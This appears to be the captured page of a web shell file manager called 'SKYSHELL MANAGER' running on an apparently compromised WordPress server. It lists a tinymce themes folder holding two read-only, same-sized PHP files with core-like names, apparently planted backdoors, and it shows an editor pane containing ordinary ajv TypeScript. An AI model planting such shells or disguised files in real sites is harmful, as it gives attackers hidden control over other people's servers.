📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: _util.ts
import type {DefinitionOptions} from "./_types" import type {SchemaObject, KeywordCxt, Name} from "ajv" import {_} from "ajv/dist/compile/codegen" const META_SCHEMA_ID = "http://json-schema.org/schema" export function metaSchemaRef({defaultMeta}: DefinitionOptions = {}): SchemaObject { return defaultMeta === false ? {} : {$ref: defaultMeta || META_SCHEMA_ID} } export function usePattern( {gen, it: {opts}}: KeywordCxt, pattern: string, flags = opts.unicodeRegExp ? "u" : "" ): Name { const rx = new RegExp(pattern, flags) return gen.scopeValue("pattern", { key: rx.toString(), ref: rx, code: _`new RegExp(${pattern}, ${flags})`, }) }
Save